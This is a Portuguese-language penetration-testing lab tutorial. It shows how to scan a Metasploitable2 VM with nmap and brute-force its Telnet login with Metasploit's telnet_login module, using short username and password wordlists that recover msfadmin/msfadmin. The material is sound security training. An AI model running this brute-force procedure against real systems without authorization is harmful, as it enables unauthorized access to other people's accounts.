Introdução
Neste laboratório, aprenderemos como explorar a vulnerabilidade do serviço Telnet e realizar um ataque de penetração. O cenário envolve o uso da máquina Kali Linux como máquina atacante e a máquina virtual Metasploitable2 como máquina alvo. O objetivo é verificar a máquina alvo em busca de vulnerabilidades, identificar a falha no serviço Telnet e explorá-la usando o Metasploit Framework.
Iniciar o ambiente de laboratório
Nesta etapa, iniciaremos o ambiente de laboratório, que inclui o contêiner Kali Linux e a máquina virtual Metasploitable2.
- Abra um terminal xfce na máquina host do LabEx e inicie o alvo Metasploitable2 executando o seguinte comando:
sudo virsh start Metasploitable2
Aguarde a inicialização da máquina alvo; isso pode levar de 1 a 3 minutos.
- Teste a conectividade com a máquina alvo fazendo um ping:
ping 192.168.122.102
Pressione Ctrl+C para interromper o ping.
- Inicie o contêiner Kali Linux e entre no ambiente bash executando:
docker run -ti --network host b5b709a49cd5 bash
- Dentro do contêiner Kali, teste a conexão de rede com a máquina alvo:
ping 192.168.122.102
Pressione Ctrl+C para interromper o ping.
Agora, tanto a máquina de ataque quanto a máquina alvo estão em execução, e você pode iniciar o teste de penetração.
Nota: Se você sair acidentalmente do bash atual, o contêiner Kali será interrompido automaticamente. Você pode executar docker run -ti --network host b5b709a49cd5 bash novamente no host para iniciar um novo contêiner Kali e entrar no bash para continuar o experimento.
Realizar a verificação de vulnerabilidades
Nesta etapa, usaremos o Nmap para verificar a máquina alvo em busca de portas e serviços abertos.
Primeiro, inicie o banco de dados PostgreSQL, pois o Metasploit precisa dele para armazenamento de dados:
service postgresql start
msfdb init
cd ~
msfconsole
Dentro do console do Metasploit, execute a verificação do Nmap contra a máquina alvo:
nmap -sV -T4 192.168.122.102
A opção -sV verifica portas abertas e mostra informações detalhadas, enquanto -T4 define a política de temporização da verificação (0-5, valores mais altos são mais rápidos, porém mais ruidosos).
Analisar os resultados da verificação
Nesta etapa, analisaremos os resultados da verificação do Nmap para identificar o serviço Telnet vulnerável.
A saída da verificação do Nmap mostra que o serviço Telnet está rodando na porta 23 com o banner "Linux telnetd". Vamos procurar o módulo correspondente no Metasploit:
search scanner/telnet
Use o módulo auxiliary/scanner/telnet/telnet_login:
use auxiliary/scanner/telnet/telnet_login
Mostre as opções do módulo:
show options
A opção obrigatória é RHOSTS, que especifica o(s) host(s) alvo.
Pressione Ctrl+D para sair do console do Metasploit e, em seguida, inicie a inspeção
Preparar o dicionário de nomes de usuário e senhas
Nesta etapa, prepararemos os arquivos de dicionário de nomes de usuário e senhas para o ataque de força bruta de login.
Retorne ao shell do contêiner Kali antes de criar os arquivos. Se você ainda estiver dentro do msfconsole, pressione Ctrl+D para sair para o shell do contêiner. Seu prompt deve parecer com root@...:/#.
Crie o arquivo /username.txt com os seguintes nomes de usuário:
cat > /username.txt <<'EOF'
123456
admin
msfadmin
root
kali
EOF
Crie o arquivo /password.txt com as seguintes senhas:
cat > /password.txt <<'EOF'
abc123
1234
123456
root
msfadmin
admin
toor
EOF
Esses arquivos serão usados como dicionários de nomes de usuário e senhas para o ataque de força bruta.
Configurar o módulo do Metasploit
Nesta etapa, configuraremos o módulo do Metasploit com o host alvo, o dicionário de nomes de usuário e o dicionário de senhas.
Primeiro, se você não estiver no console do Metasploit, inicie-o:
cd ~
msfconsole
Use o módulo auxiliary/scanner/telnet/telnet_login:
use auxiliary/scanner/telnet/telnet_login
Defina o host alvo:
set RHOSTS 192.168.122.102
Defina o arquivo de dicionário de nomes de usuário:
set USER_FILE /username.txt
Defina o arquivo de dicionário de senhas:
set PASS_FILE /password.txt
Por fim, execute o exploit:
exploit
O Metasploit começará a testar diferentes combinações de nomes de usuário e senhas a partir dos dicionários fornecidos. Se uma credencial válida for encontrada, ela será exibida em verde.
Neste caso, a credencial válida é msfadmin/msfadmin.
Pressione Ctrl+D para sair do console do Metasploit e, em seguida, inicie a inspeção
Resumo
Neste laboratório, aprendemos como explorar a vulnerabilidade do serviço Telnet usando o Metasploit Framework. Começamos configurando o ambiente de laboratório com a máquina atacante Kali Linux e a máquina alvo Metasploitable2. Em seguida, realizamos a verificação de vulnerabilidades usando o Nmap para identificar o serviço Telnet aberto. Depois, preparamos os dicionários de nomes de usuário e senhas e configuramos o módulo do Metasploit com o host alvo e os arquivos de dicionário. Finalmente, executamos o exploit e realizamos com sucesso o ataque de força bruta nas credenciais de login do Telnet.
Este laboratório proporcionou experiência prática em testes de penetração, verificação de vulnerabilidades e utilização do Metasploit Framework para explorar falhas de segurança. Ele destacou a importância de práticas seguras de senha e os riscos potenciais do uso de credenciais fracas ou facilmente adivinháveis.



